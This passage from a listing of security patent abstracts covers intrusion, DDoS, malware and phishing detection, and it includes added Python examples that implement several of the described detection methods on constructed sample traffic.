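The three stages in the entry above, run over a constructed batch of records, as an added example that is not the patent's own code: each record is one connection to the protected device carrying one transaction of some type; stage two runs only when stage one trips, stage three only when stage two does. The record format, the thresholds and the sample traffic are assumptions for the demo.

```python
# Added example (not the patent's own code): the three-stage analysis run over a
# constructed batch of (client_ip, transaction_type) records, one record per
# connection to the protected device. Thresholds are assumptions for the demo.
from collections import Counter


def three_stage_analysis(records, conn_threshold=100, type_threshold=60,
                         client_threshold=20):
    """Return the set of client addresses that trip all three stages.

    Stage 1: total connections to the protected device over the window.
    Stage 2: per-type transaction counts, only if stage 1 tripped.
    Stage 3: per-client counts for the hot types, only if stage 2 tripped."""
    if len(records) <= conn_threshold:
        return set()
    by_type = Counter(kind for _, kind in records)
    hot_types = {kind for kind, n in by_type.items() if n > type_threshold}
    if not hot_types:
        return set()
    per_client = Counter(client for client, kind in records if kind in hot_types)
    return {client for client, n in per_client.items() if n > client_threshold}


# Constructed traffic: 40 distinct users each fetch one page ...
LEGIT = [(f"192.0.2.{i}", "GET") for i in range(1, 41)]
# ... plus one client hammering the login form.
SINGLE_ATTACKER = [("198.51.100.7", "POST") for _ in range(90)]
# The same 90 POSTs spread over five clients, each staying below the client threshold.
SPREAD_ATTACK = [(f"198.51.100.{10 + i % 5}", "POST") for i in range(90)]

if __name__ == "__main__":
    print(three_stage_analysis(LEGIT + SINGLE_ATTACKER))   # one address to act on
    print(three_stage_analysis(LEGIT + SPREAD_ATTACK))     # nothing to act on
```

The second run is the caveat a practitioner should keep in mind: stages one and two still trip, but a flood spread thinly enough that no single address crosses the client-transaction threshold produces no programmed action, so the per-client threshold has to be tuned against the number of sources an attacker can plausibly bring.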
20110055920METHOD AND SYSTEM FOR AUTONOMOUS CONTROL AND PROTECTION OF COMPUTER SYSTEMS - A management system includes a plurality of components within a computer system. A plurality of component resource managers is provided, and each of the components is controlled by at least one of the plurality of component resource managers. A plurality of component management interfaces is also provided. Each of the components communicates with at least one of the controlling component resource managers via one of the component management interfaces. At least one runtime manager autonomously controls operation of the components and the component resource managers.03-03-2011
20080209554Spam honeypot domain identification - Identification of spam honeypot domains is performed automatically by a system 08-28-2008
20120204261SYSTEM AND METHOD FOR UNIFIED COMMUNICATIONS THREAT MANAGEMENT (UCTM) FOR CONVERGED VOICE, VIDEO AND MULTI-MEDIA OVER IP FLOWS - A method and system for unified communications threat management (UCTM) for converged voice and video over IP is disclosed. A computer-implemented method for threat management receives an incoming packet. The incoming packet is broken into sub-packets and fed to a plurality of packet processing engines. Each packet processing engine inspects the sub-packets and annotates them with meta-data. The annotated sub-packets are combined and processed by a plurality of application engines to generate a processed packet. The processed packet is classified and stored in a database.08-09-2012
20100325726UNAUTHORIZED OPERATION MONITORING PROGRAM, UNAUTHORIZED OPERATION MONITORING METHOD, AND UNAUTHORIZED OPERATION MONITORING SYSTEM - It is possible to provide an unauthorized operation monitoring program that calculates a modified score by reflecting a suspicious value determined from a series of operations by a user who operates a computer, in order to monitor unauthorized operations on the computer. When a modified score that indicates the probability of an unauthorized operation is calculated for an object event, a suspicious value (PSV) corresponding to the level of the calculated modified score is set. When a new event occurs next, a modified score is calculated for the new event from its own score (the direct score), the PSV set for the previous event, and the time difference between the previous event and the new event. When operations for which the probability of an unauthorized operation is high are performed continuously, or when operations whose suspicious value is high are repeated, a higher modified score results.12-23-2010
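The scoring chain in the entry above, as an added example that is not the patent's own code: each event's modified score is its direct score plus the previous event's PSV decayed by the time elapsed, and the PSV carried forward is chosen from the level of the modified score just computed. The direct scores, the PSV levels, the half-life decay and the two sample event streams are assumptions for the demo.

```python
# Added example (not the patent's own code): carry a suspicious value (PSV) from
# one event to the next, decayed by the time between them. Direct scores, the
# PSV levels and the half-life are assumptions for the demo.


def psv_for(modified_score: float) -> float:
    """Suspicious value set for an event, by the level of its modified score."""
    if modified_score >= 80:
        return 40.0
    if modified_score >= 50:
        return 20.0
    if modified_score >= 20:
        return 5.0
    return 0.0


def modified_score(direct: float, prev_psv: float, dt_seconds: float,
                   half_life: float = 600.0) -> float:
    """Direct score for the new event plus the previous PSV, halved every half_life seconds."""
    return direct + prev_psv * 0.5 ** (dt_seconds / half_life)


def score_sequence(events):
    """events: iterable of (timestamp_seconds, direct_score) in time order.
    Returns the modified score for each event, rounded to 2 decimals."""
    scores = []
    prev_psv, prev_t = 0.0, None
    for t, direct in events:
        if prev_t is None:
            score = direct
        else:
            score = modified_score(direct, prev_psv, t - prev_t)
        scores.append(round(score, 2))
        prev_psv, prev_t = psv_for(score), t
    return scores


# Constructed event streams: the same three copy-to-removable-media operations,
# one minute apart versus ten hours apart.
BURST = [(0, 70.0), (60, 70.0), (120, 70.0)]
SPACED = [(0, 70.0), (36000, 70.0), (72000, 70.0)]

if __name__ == "__main__":
    print(score_sequence(BURST))    # climbs past 100 by the third event
    print(score_sequence(SPACED))   # stays at the direct score of 70
```

The same three operations produce an escalating score when they arrive in a burst and a flat one when they are hours apart, which is the behaviour the entry describes; in practice the half-life is the knob that decides how long a suspicious action keeps colouring what follows it.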
20110167490SYSTEM AND METHOD FOR SECURE DISTRIBUTED EXECUTION - This invention discloses a method and system for processing logic modules, each having a separate functionality, into a unique functionality that is to be executed in an interlocked mode as a unique functionality. The method is based on taking logic modules (programs and data) with known functionality and transforming them into a hidden program by integrating modules to execute together into a logic which is partially obfuscated and/or encrypted and/or physically hidden. The hidden program is updated dynamically to strengthen it against reverse engineering efforts. The program includes the functionality for generating security signals, which are unpredictable by observers, such as a pseudo random sequence of security signals. Only elements that share the means for producing the security signals can check their validity. The modules include operational tasks and performance parameters for this operation. The operation can be transmission of data packets with given parameters of performance that the hidden program contains. The generated security signals thus ensure that the correct operation took place and can be used to signal various cryptographic parameters as well.07-07-2011
20120311706PAYMENT CARD INDUSTRY (PCI) COMPLIANT ARCHITECTURE AND ASSOCIATED METHODOLOGY OF MANAGING A SERVICE INFRASTRUCTURE - A system to ensure compliance with data security standards includes a security appliance to perform multiple security functions, with the security appliance including an initial configuration. The system further includes a display unit to provide information of compliance performance of the system on a secure basis. The system also includes a control unit to monitor compliance performance in real-time and to implement additional procedures required based on the monitored compliance to ensure compliance with data security standards.12-06-2012
20120311705SYSTEM, METHOD, AND COMPUTER PROGRAM PRODUCT FOR PRESENTING AN INDICIA OF RISK REFLECTING AN ANALYSIS ASSOCIATED WITH SEARCH RESULTS WITHIN A GRAPHICAL USER INTERFACE - A system, method, and computer program product comprise presenting a plurality of search results within a graphical user interface. Further, an indicia of risk is presented that reflects an analysis in association with at least one of the plurality of search results within the graphical user interface.12-06-2012
20120311704Method and Apparatus for Efficient Netflow Data Analysis - A flow based detection system for detecting network attacks on data networks. Flow records are collected in a novel data structure that facilitates efficient sorting. The sorted data structure can subsequently be analyzed in an efficient manner to find out whether the network is under attack. An attack is identified if the number of unique corresponding addresses or conversations is too large.12-06-2012
20120311703REPUTATION-BASED THREAT PROTECTION - Information concerning a plurality of identified threats provided by a plurality of preselected sources is stored in memory. An e-mail message may be received over a communication network. The received e-mail message is separated into a plurality of components. The stored information is searched to identify a reputation score associated with each of the plurality of components. It is then determined whether the e-mail is a threat based on the identified reputation score of each of the plurality of components. The determination is sent to a designated recipient.12-06-2012
20120311702SYSTEM AND METHOD FOR PRESERVING REFERENCES IN SANDBOXES - Disclosed herein are systems, methods, and non-transitory computer-readable storage media for preserving references in sandboxes. A system implementing the method receives a document for use in a sandbox environment and passes the document to a parser, via a coordinator. The parser finds references in the document to other resources and outputs a list of references. The system passes the list of references to a verifier that verifies each reference and outputs a list of verified references. The system passes the list of verified references to the sandboxed application which extends the sandbox to include the resources on the list of verified references. In one embodiment, the system preserves references in sandboxes without the use of a coordinator.12-06-2012
20110138463METHOD AND SYSTEM FOR DDOS TRAFFIC DETECTION AND TRAFFIC MITIGATION USING FLOW STATISTICS - Disclosed are a method and system for distributed denial of service (DDoS) attack detection and traffic mitigation using flow statistics. The method for DDoS attack detection and traffic mitigation using flow statistics includes: collecting first statistics for each flow based on flow information generated by traffic flow of a network connection device; and grouping the first statistics for each flow on a per-flow basis and processing the same into second statistics containing at least one of the number of bytes, the number of packets, and the number of flows per unit time.06-09-2011
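One block serving both the NetFlow-analysis entry (20120311704) and the flow-statistics entry above, as an added example that is not either patent's own code: per-flow records (the first statistics) are grouped per destination, port and time window into bytes, packets, flow count and unique sources per unit time (the second statistics), the keys are kept sortable, and a window is flagged when its unique-source or flow count is too large. The record format, the window size, the thresholds and the sample traffic are constructed for the demo.

```python
# Added example (not the patent's own code) serving both the NetFlow-analysis
# entry and the flow-statistics entry: per-flow records are grouped per
# destination and time window into bytes, packets and flows per unit time, and
# a window is flagged when the number of unique peers or flows is too large.
# Records, field names and thresholds are constructed for the demo.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class FlowRecord:
    ts: int          # flow start time, seconds
    src: str
    dst: str
    dport: int
    packets: int
    bytes: int


def second_statistics(flows, window=10):
    """Group first (per-flow) statistics into second statistics keyed by
    (dst, dport, window index): bytes, packets, flow count and unique sources."""
    stats = defaultdict(lambda: {"bytes": 0, "packets": 0, "flows": 0, "srcs": set()})
    for f in flows:
        s = stats[(f.dst, f.dport, f.ts // window)]
        s["bytes"] += f.bytes
        s["packets"] += f.packets
        s["flows"] += 1
        s["srcs"].add(f.src)
    return stats


def flagged_windows(stats, max_unique_srcs=50, max_flows=100):
    """Sorted keys whose unique-source count or flow count exceeds its threshold."""
    return sorted(k for k, s in stats.items()
                  if len(s["srcs"]) > max_unique_srcs or s["flows"] > max_flows)


# Constructed sample: five users on HTTPS, and 80 spoofed sources each opening
# one tiny flow to port 80 of another host inside the same 10 s window.
LEGIT = [FlowRecord(t, f"10.0.0.{i}", "192.0.2.10", 443, 40, 52000)
         for i, t in enumerate((1, 2, 3, 4, 5), start=1)]
FLOOD = [FlowRecord(3, f"198.51.100.{i}", "192.0.2.20", 80, 1, 40)
         for i in range(1, 81)]

if __name__ == "__main__":
    stats = second_statistics(LEGIT + FLOOD)
    for key in flagged_windows(stats):
        print(key, {k: (len(v) if isinstance(v, set) else v) for k, v in stats[key].items()})
```

The flood window stands out on two of the second statistics at once: many unique sources and many flows carrying almost no bytes, which is the shape of a SYN-style flood rather than a popular download, and the sorted keys let an operator walk the flagged windows in destination and time order.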
20110138464STATE NOTIFICATION APPARATUS, STATE NOTIFICATION METHOD, AND COMPUTER-READABLE STORAGE MEDIUM - A state notification apparatus comprises: a holding unit that, when one or more secure runtime environments and one or more non-secure runtime environments are selectively executed in a foreground, holds an identifier of a runtime environment that is being executed in the foreground; a determination unit that determines a state of the runtime environment executed in the foreground based on the identifier held by the holding unit; and a notification unit that causes a hardware device that cannot be accessed from the one or more non-secure runtime environments to notify the state determined by the determination unit.06-09-2011
20110138462SYSTEM AND METHOD FOR DETECTING VOIP TOLL FRAUD ATTACK FOR INTERNET TELEPHONE - Provided is a system for detecting a voice over Internet protocol (VoIP) toll fraud attack. The system includes: a database (DB) storing registration information of normal users; a packet reception module receiving a call set-up packet from a network; and a VoIP signaling message forgery/falsification detection module receiving the call set-up packet from the packet reception module and comparing sender address information or header information of the call set-up packet with the registration information stored in the DB to detect whether the call set-up packet is a packet received from one of the normal users.06-09-2011
20100180341METHOD FOR PROTECTION A NETWORK THROUGH PORT BLOCKING - A method for protecting a network against a security attack from a user, and in particular, for a layer 2 switch, against a MAC flooding attack. Here, the MAC flooding attack floods the layer 2 switch with at least one packet; a database is provided which saves a MAC address and its allocation, and the database has a maximum quantity. According to the method, an interface between the user of the network and a network access functions as a line of demarcation. When the limit of the maximum quantity for a port is reached, the port is blocked for a blocking time. This protects not only the first access node but also the following network nodes and users, respectively, against a security attack.07-15-2010
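The per-port limit and blocking time from the entry above, as an added example that is not the patent's own code: a guard in front of the switch's MAC table learns source addresses per port, blocks the port for a blocking time once its quota is reached, and reopens it with an empty table when the time expires, so a single flooded port cannot exhaust the shared database. The quota, the blocking time and the sample frames are assumptions for the demo.

```python
# Added example (not the patent's own code): a per-port MAC learning limit in
# front of a layer 2 switch's address table. When a port reaches its quota the
# port is blocked for a blocking time, so one flooded port cannot exhaust the
# table for everyone else. Limits and the sample frames are assumptions.


class PortGuard:
    def __init__(self, max_macs_per_port: int, blocking_time: float):
        self.max_macs_per_port = max_macs_per_port
        self.blocking_time = blocking_time
        self.table = {}           # port -> set of learned MACs
        self.blocked_until = {}   # port -> time the block expires

    def is_blocked(self, port, now) -> bool:
        expiry = self.blocked_until.get(port)
        if expiry is None:
            return False
        if now < expiry:
            return True
        # Block expired: reopen the port with an empty learning table.
        del self.blocked_until[port]
        self.table[port] = set()
        return False

    def accept(self, port, src_mac, now) -> bool:
        """Return True if a frame with src_mac on port is forwarded (and learned),
        False if it is dropped because the port is blocked or just hit its quota."""
        if self.is_blocked(port, now):
            return False
        macs = self.table.setdefault(port, set())
        if src_mac in macs:
            return True
        if len(macs) >= self.max_macs_per_port:
            self.blocked_until[port] = now + self.blocking_time
            return False
        macs.add(src_mac)
        return True


if __name__ == "__main__":
    guard = PortGuard(max_macs_per_port=3, blocking_time=60.0)
    # Constructed frames: three real hosts on port 1, then a flood of random MACs.
    for mac in ("aa", "bb", "cc", "dd", "ee"):
        print(mac, guard.accept(1, mac, now=0))
    print("known host while blocked:", guard.accept(1, "aa", now=10))
    print("other port unaffected:", guard.accept(2, "zz", now=10))
    print("after block expires:", guard.accept(1, "aa", now=61))
```

Note the trade-off the entry accepts: while the port is blocked, legitimate hosts behind it lose connectivity for the blocking time too, which is why the quota should sit comfortably above the number of hosts expected on an access port.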
20100115613Cacheable Mesh Browsers - Methods and systems for improving the end-user experience by reducing the latency of data access across networks by accessing peer browser caches are disclosed. In one embodiment, a method of accessing a web data element includes: transmitting a first request for the web data element from a first browser to a home location of the web data element; transmitting a second request for the web data element from the first browser to one or more hosts including a second browser accessible by the first browser; receiving a cached copy of the web data element by the first browser from the second browser; and displaying the cached copy of the web data element. In another embodiment, a method of improving access to a web data element, includes: receiving a copy of the web data element at a first browser in response to a first request initiated from the first browser; storing the copy of the web data element in a cache controlled by the first browser as a cached web data element; receiving a request for the web data element from a second browser; and providing a copy of the cached web data element to the second browser.05-06-2010
20100115615SYSTEM AND METHOD FOR DYNAMIC AND REAL-TIME CATEGORIZATION OF WEBPAGES - A system and method for categorizing content on a webpage is disclosed. The method comprises receiving a request for a webpage from a user's computer. Next, the system determines whether there is dynamic content on the webpage by analyzing the address, links, reputation, type, style and other indicators of being able to easily change the webpage. If the webpage contains content that can be changed, then the webpage is analyzed to determine a current categorization thereof. If the webpage does not have dynamic content then the categorization of the webpage will remain the same thereby freeing system resources by only analyzing dynamic webpages.05-06-2010
20100115614DATA LOSS PROTECTION THROUGH APPLICATION DATA ACCESS CLASSIFICATION - A method and apparatus for classifying behavior of an application based on its data access pattern is described. In one embodiment, the method includes monitoring file access events associated with an application, and determining whether at least one of the file access events indicates the application's attempt to manipulate data of a file. If at least one file access event indicates the application's attempt to manipulate the data within the file, then at least one action is caused to be performed.05-06-2010
20100077478Method and Apparatus for Publishing Documents Over a Network - An apparatus and method for publishing an electronic document on a network is described. In one embodiment, an apparatus for publishing an electronic document on a wide area network comprises at least one server and a client, the client having memory for storing an electronic document and means for sending the electronic document to the server, wherein a URL is associated with the electronic document, a security key is associated with the URL, and means are provided for sending the URL to a user.03-25-2010
20110179483METHODS FOR HANDLING A FILE ASSOCIATED WITH A PROGRAM IN A RESTRICTED PROGRAM ENVIRONMENT - Techniques for handling a file associated with a program are described herein. According to an aspect of the invention, in response to a request for accessing a file received through a first program, the file is stored in a first sandboxed storage area, where the file is to be accessed by a second program. An atomic move operation is then performed on the file that atomically moves the file from the first sandboxed storage area to a second sandboxed storage area, where the first sandboxed storage area is not accessible to the first program and second program. The second program is launched to access the file stored in the second sandboxed storage area, where the second sandboxed storage area is a part of a sandbox associated with the second program.07-21-2011
20110179484MALWARE DETECTION SYSTEM AND METHOD FOR MOBILE PLATFORMS - In one example, a management server is configured to provide malware protection for one or more client mobile platforms in communication with the management server via a mobile network. In the example, the management server includes a processor configured to detect malware in the mobile network, select a client mobile platform having a malware scanning agent, and, manage the malware scanning agent of the client mobile platform using a device independent secure management protocol based at least in part on the malware detected in the mobile network.07-21-2011
20100263046SECURITY WRAPPER METHODS AND SYSTEMS - In one example, a web content security system embedded in a computer-usable storage medium that identifies potential threats when executed by one or more processors is provided. The web content security system includes a communications monitor module that monitors at least one of data communications between web objects on a web page and data communications between web objects on a web page and a server, and that identifies a potential threat based on the data communications. A logger module generates report data based on the identified potential threat.10-14-2010
20120151581METHOD AND SYSTEM FOR INFORMATION PROPERTY MANAGEMENT - A system for managing sensitive information property, includes a monitoring agent installed in a host system needed for sensitive information property management and configured to monitor the sensitive information property; an information property storage configured to store a list of the sensitive information property for the host system; and an information property manager configured to determine whether or not the sensitive property has leaked.06-14-2012
20090300760Grid Security Intrusion Detection Configuration Mechanism - A method, apparatus, and article of manufacture are provided to support security in a distributed grid computer cluster. Each non-root node in the cluster is configured with a local security agent, and the root node is configured with a security controller to manage the security agents of the non-root nodes. The security agent of each non-root node is in communication with an associated configuration file that contains data private to the respective non-root node, to allow the security agent to manage security local to the node. The security controller of the root node is in communication with a controller configuration file that contains data that applies to all security agents in the grid cluster, to allow the controller to manage the security agents.12-03-2009
20090293121DEVIATION DETECTION OF USAGE PATTERNS OF COMPUTER RESOURCES - Embodiments of the invention provide a method for detecting changes in behavior of authorized users of computer resources and reporting the detected changes to the relevant individuals. The method includes evaluating actions performed by each user against user behavioral models and business rules. As a result of the analysis, a subset of users may be identified and reported as having unusual or suspicious behavior. In response, the management may provide feedback indicating that the user behavior is due to the normal expected business needs or that the behavior warrants further review. The management feedback is available for use by machine learning algorithms to improve the analysis of user actions over time. Consequently, investigation of user actions regarding computer resources is facilitated and data loss is prevented more efficiently relative to the prior art approaches with only minimal disruption to the ongoing business processes.11-26-2009
20110154487SOFTWARE BEHAVIOR MODELING DEVICE, SOFTWARE BEHAVIOR MODELING METHOD, SOFTWARE BEHAVIOR VERIFICATION DEVICE, AND SOFTWARE BEHAVIOR VERIFICATION METHOD - A software behavior modeling device which forms a model of a behavior of software includes: an event information acquisition unit configured to acquire event information indicating a specific event which occurs during execution of the software; a stack information acquisition unit configured to acquire stack information stored in a call stack at a time of occurrence of the specific event; a score setting unit configured to set a score in accordance with a storage location in which each element included in the stack information is stored in the call stack; and a model generating unit configured to form a model of a relationship between the specific event and the element by using the score, and to generate a behavior model of the software.06-23-2011
20110265181METHOD, SYSTEM AND GATEWAY FOR PROTECTION AGAINST NETWORK ATTACKS - A method, a system and a gateway for protection against network attacks are provided. The method includes: receiving source request information and destination request information that are sent by a client, where the destination request information is notified by a Domain Name System (DNS) to the client sending the source request information; checking the source request information and the destination request information; and discarding the source request information and the destination request information when the check fails. Through the technical solution, the DNS selects the destination request information according to the source request information sent by the client, and establishes a corresponding relation between the client and a server according to a matching relation between the source request information and the destination request information, so as to prevent DDoS attacks.10-27-2011
20110265180TAMPERING MONITORING SYSTEM, MANAGEMENT APPARATUS, AND MANAGEMENT METHOD - An information security apparatus (10-27-2011
20110265179RESTRICTING USER ACCESS ON SHARED COMPUTER - A method for restricting, based on predefined user profile information, access to software executing on a computing device of a user. The method comprises the following steps. Input data is intercepted from a user input device. The input data is compared with a list of restrictions in the user profile information to determine whether an action associated with the input data is prohibited. The input data is passed to the software for execution only if the action associated with the input data is not prohibited. A method for restricting, based on predefined user profile information, access to notifications generated for a user is also provided.10-27-2011
20100031356BINDING UPDATE METHOD IN MIPv6 - A binding update method in MIPv6 is provided which includes: a first step of allowing a mobile node to generate a HoTI (Home Test Init) message including a HoA (Home Address) encoded with a product of a first prime number and a second prime number and to transmit the HoTI message to a corresponding node through a home agent along with a first index; a second step of allowing the mobile node to generate a CoTI (Care of Test Init) message including a CoA (Care-of Address) encoded with a product of the first prime number and a third prime number and to transmit the CoTI message directly to the corresponding node along with a second index; a third step of allowing the corresponding node to generate a HoT (Home of Test) message including a first nonce and to transmit the HoT message to the mobile node through the home agent; a fourth step of allowing the corresponding node to generate a CoT (Care-of Test) message including a second nonce and to transmit the CoT message to the mobile node; a fifth step of allowing the mobile node to generate a BU (Binding Update) message by adding the first prime number to the first nonce and the second nonce included in the HoT message and the CoT message and to transmit the BU message to the corresponding node; and a sixth step of allowing the corresponding node to verify the BU message using an exclusive OR operation and a factorization operation in prime numbers with the first prime number and to transmit a BA (Binding Ack) message to the mobile node.02-04-2010
20100031353Malware Detection Using Code Analysis and Behavior Monitoring - Aspects of the subject matter described herein relate to malware detection using code analysis and behavior monitoring. In aspects, an anti-malware engine performs static analysis on program code and monitors behavior of the program code that is exhibited when the program code executes in a virtual and/or non-virtual environment. The anti-malware engine combines the results of both types of malware detection to determine whether the program code includes malware. The anti-malware engine may use feedback from one or more of the malware detection mechanisms to direct additional malware detection (e.g., static and/or behavior detection) for the program code.02-04-2010
20100024032METHOD AND APPARATUS FOR EFFECTING AN INTERNET USER'S PRIVACY DIRECTIVE - Disclosed is a method for effecting an internet user's privacy directive. In the method, copied packets, that are based on original packets sent from a user client, are monitored for a web content request including state information that is not in compliance with a user's privacy directive. Upon detection of a copied packet having a web content request including noncompliant state information, the state information is modified to comply with the user's privacy directive. A replacement packet is forwarded to the user client such that the user client receives the replacement packet before receiving a response packet from a target server of the corresponding original packet. The replacement packet has a redirection with a renewed web content request including the modified state information.01-28-2010
20100017878PRECISE WEB SECURITY ALERT - A method for providing an alert when a potentially or likely malicious web site is browsed to by a user. The method maintains web site identification details. If a web site purporting to be a known, previously identified, encountered and utilized web site is browsed to and requests information, the user is alerted to the precise differences between the stored web site historical identity and the identity of the present requester.01-21-2010
20100017877METHODS AND SYSTEMS FOR DETERMINING FILE CLASSIFICATIONS - A computer-implemented method for determining file classifications. The method may include determining identification information of a first file stored on a first computing system. The method may also include querying a second computing system for classification information by sending the identification information of the first file to the second computing system. The first computing system may receive, in response to the query, identification information of a second file. The first computing system may also receive the classification information. The classification information may indicate that the first file and second file are trusted. The first computing system may use the identification information of the second file to determine that the second file is stored on the first computing system. The first computing system may also apply the classification information to the first and second files by excluding the first and second files from a security scan.01-21-2010
20080313734DISTRIBUTED SYSTEM AND METHOD FOR THE DETECTION OF eTHREATS - The invention relates to a distributed system for detecting eThreats that propagate in a network, which comprises: (a) graphs database storing at least one propagation graph, each graph describing the typical propagation over time of one eThreat class or a legitimate executable class within the network; (b) plurality of agents that are distributed in corresponding plurality of hosts within the network, each of said agents continuously monitoring the corresponding host and reporting to a Central Decision Maker (CDM) the identity of any new suspected executable, and the time in which said suspected executable has been first detected by said agent; (c) a CDM for: (c.1) receiving all said reports from said plurality of agents; (c.2) creating from said reports for each suspected executable a corresponding propagation graph which reflects the propagation characteristics over time of said suspected executable within the network, and (c.3) comparing each of said created graphs with said stored at least one propagation graph; (c.4) upon finding a similarity above a predefined threshold between a created graph and one of the stored graphs, concluding respectively that said executable belongs to the class as defined by said stored graph; and (c.5) conveying said conclusion to said agents, for optionally taking an appropriate action.12-18-2008
20090165135SYSTEM AND METHODS FOR DETECTING SOFTWARE VULNERABILITIES AND MALICIOUS CODE - A system and method determines whether software includes malicious code. A validation machine is instrumented with tools and monitors that capture the static and dynamic behavior of software. Software under examination is executed on the validation machine, and the tools and monitors are used to log data representative of the behavior of the software to detect vulnerable or malicious code. If possible, one or more operations are automatically performed on the software to enhance the security of the software by neutralizing the vulnerable or malicious code. Activities that cannot be neutralized automatically are flagged for human inspection. The software executed on the validation machine may be source code or non-source code, with different operations being disclosed and described in each case.06-25-2009
20120210426ANALYSIS SYSTEM FOR UNKNOWN APPLICATION LAYER PROTOCOLS - An analysis system for unknown application layer protocols, which could automatically discover unknown applications existing in a network, and then obtain keywords, attribute values, status codes or type codes representing the semantic meaning of each field in each type of unknown application, as well as message formats, dialogue rules and status transfer relations of application layer protocols, by using cluster analysis and an optimal partitioning method based on a hidden semi-Markov model. The unknown application analysis result could be used for flow management and security protection of a network. The system has the following advantages: it avoids difficulties arising from manual discovery and analysis of unknown applications, and improves network management efficiency and response speed against new types of network attacks.08-16-2012
20110307954SYSTEM AND METHOD FOR IMPROVING COVERAGE FOR WEB CODE - A system and method for improving code coverage for web code that is analyzed for security purposes by dynamic code execution are described. A controller receives information, routes the information to the appropriate engine, analyzer or module and provides the functionality for improving code coverage for code analyzed for security purposes. A code rewrite engine rewrites code in such a way that all branches and stray functions will be executed. A dynamic analyzer performs dynamic analysis on web content to detect malicious code. Additionally, a static analyzer performs static analysis on web content. The static analyzer scans web content and detects a style of coding, a style of obfuscation of the code or patterns in the code.12-15-2011
20090007267METHOD AND SYSTEM FOR TRACKING AUTHORSHIP OF CONTENT IN DATA - According to one aspect of the invention, iterative local alignment is employed to process two versions of a text and to identify novel contributions and their positions in the newer text version. In one embodiment, the new or target version of the text is aligned to the old or reference version of the text in an iterative process. The iterative process produces a local alignment of both text versions, which is optimal according to the selected parameters. In another embodiment, aligned substrings are removed from the texts and the iterative process is continued until no more aligned substrings can be obtained. In one example, authorship may be transferred from every aligned substring of the reference text version to the corresponding substring of the target text version. In another example, authorship for unaligned substrings of the target text version may be assigned to the author of the target text version. In one embodiment, unaligned substrings of the reference text version can be identified as deleted by the author of the target text version. In another embodiment, deleted substrings can be stored latently and can be considered in subsequent alignments. In another aspect of the invention, the method and system for tracking authorship of content in data may be employed in collaborative text editing systems or in word processing applications to identify and track the contributions of individual authors.01-01-2009
20120042381METHOD AND SYSTEM FOR DETERMINING WHETHER DOMAIN NAMES ARE LEGITIMATE OR MALICIOUS - A system and method for determining whether at least one domain is legitimate or malicious by obtaining passive DNS query information, using the passive DNS query information to measure statistical features of known malicious domain names and known legitimate domain names, and using the statistical features to determine at least one reputation for at least one new domain, where the reputation indicates whether the at least one new domain is likely to be for malicious or legitimate uses.02-16-2012
20120042382SYSTEM AND METHOD FOR MONITORING AND ANALYZING MULTIPLE INTERFACES AND MULTIPLE PROTOCOLS - The present invention is a system and method for providing security for a mobile device by analyzing data being transmitted or received by multiple types of networks. The invention can provide security for many types of network interfaces on a mobile device, including: Bluetooth, WiFi, cellular networks, USB, SMS, infrared, and near-field communication. Data is gathered at multiple points in a given processing pathway and linked by a protocol tracking component in order to analyze each protocol present in the data after an appropriate amount of processing by the mobile device. Protocol analysis components are utilized dynamically to analyze data and are re-used between multiple data pathways so as to be able to support an arbitrary number of network data pathways on a mobile device without requiring substantial overhead.02-16-2012
20120042380SECURE MODULE AND INFORMATION PROCESSING APPARATUS - A secure module includes a generating unit that executes generation processing of generating a scanning program that causes scan processing, which generates unique code for a program under test, to be executed at a connected device and further executes update processing of randomly updating contents of the scanning program; a storage device storing therein the unique code for the program under test; and an authenticating unit that if the scanning program is executed by the connected device and executed with respect to the program under test stored at a designated storage area in the connected device, authenticates validity of the program under test stored at the designated storage area, based on the unique code stored in the storage device and execution results of the scanning program executed at the connected device.02-16-2012
20080276315ANTI-PHISHING FILTER - A method operates to detect personal identifying or account information exchanged in a real-time electronic communication occurring between computer network users, such as electronic chat. A detected personal identifier may be recognized as an attempt on the part of one user to engage in a phishing attack upon another user or to otherwise steal the other user's sensitive personal information. Upon recognizing the communication as an unwarranted attempt to collect such information, the electronic communication may be monitored, and communication of the personal information may be prevented.11-06-2008
20120066764METHOD AND APPARATUS FOR ENHANCING SECURITY IN A ZIGBEE WIRELESS COMMUNICATION PROTOCOL - The present invention relates to a technique for addressing security vulnerabilities of the ZigBee wireless communication protocol, which is frequently used as a low-power wireless communication protocol in a home network, a sensor network, or the like, and to an apparatus therefor. An ACL security hardware block having diverse security functions is proposed, and a safe and reliable ZigBee wireless communication protocol is provided by applying a method of effectively detecting a replay attack, a method of efficiently managing a group key, and a method of detecting transmission of the same nonce value in advance.03-15-2012
20120066762SYSTEM AND METHOD OF WHITELISTING PARENT VIRTUAL IMAGES - In embodiments of the present invention improved capabilities are described for virtual machine scan optimization. In response to a change in the primary virtual machine, the virtual machine scan optimization may involve comparing the primary virtual machine to the related virtual machine and tracking changes of the primary virtual machine with respect to the related virtual machine, wherein the changes are identified by location within the primary virtual machine; forming a tracked changes log; generating a relevant file map of the primary virtual machine, wherein the relevant file map includes a plurality of relevant files and each of the plurality of relevant files' locations in the primary virtual machine; comparing the changed locations identified in the tracked changes log with the locations of the plurality of relevant files to determine if any one of the plurality of relevant files has been changed; and in the event that a relevant file has been changed, as indicated by the comparison of the relevant file map to the tracked changes log, causing the changed relevant file to be security scanned.03-15-2012
20120047577SAFE URL SHORTENING - A safe URL shortening service creates a short URL from any valid long URL. At resolution time, the service determines if the resulting URL points to a known bad, known good, or unknown site. Depending on the determination results, the service may redirect a user to the target site, block redirection, or present a warning page that allows the user to manually activate the target link.02-23-2012
20120047578Method and System for Device Integrity Authentication - Device integrity authentication is performed by receiving, at a second device, data from a first device. A determination is made at the second device as to whether at least a portion of the data is associated with a protected datatype. A measured integrity value of the first device is determined in response to the portion of the data being associated with the protected datatype. The measured integrity value of the first device is compared to an embedded integrity value associated with the second device. Application of at least one of a plurality of policies associated with processing the data is facilitated at the second device based on the comparison and the protected datatype.02-23-2012
20120047576Hardware-Implemented Hypervisor for Root-of-Trust Monitoring and Control of Computer System - A system and method for modifying a processor system with hypervisor hardware to provide protection against malware. The processor system is assumed to be of a type having at least a CPU and a high-speed bus for providing data links between the CPU, other bus masters, and peripherals (including a debug interface unit). The hypervisor hardware elements are (1) a co-processor programmed to perform one or more security tasks; (2) a communications interface between the co-processor and the debug interface unit; (3) a behavioral interface on the high-speed bus, configured to monitor control signals from the CPU, and (4) an access controller on the high-speed bus, configured to store access control data, to intercept requests on the high-speed bus, to evaluate the requests against the access control data, and to grant or deny the requests.02-23-2012
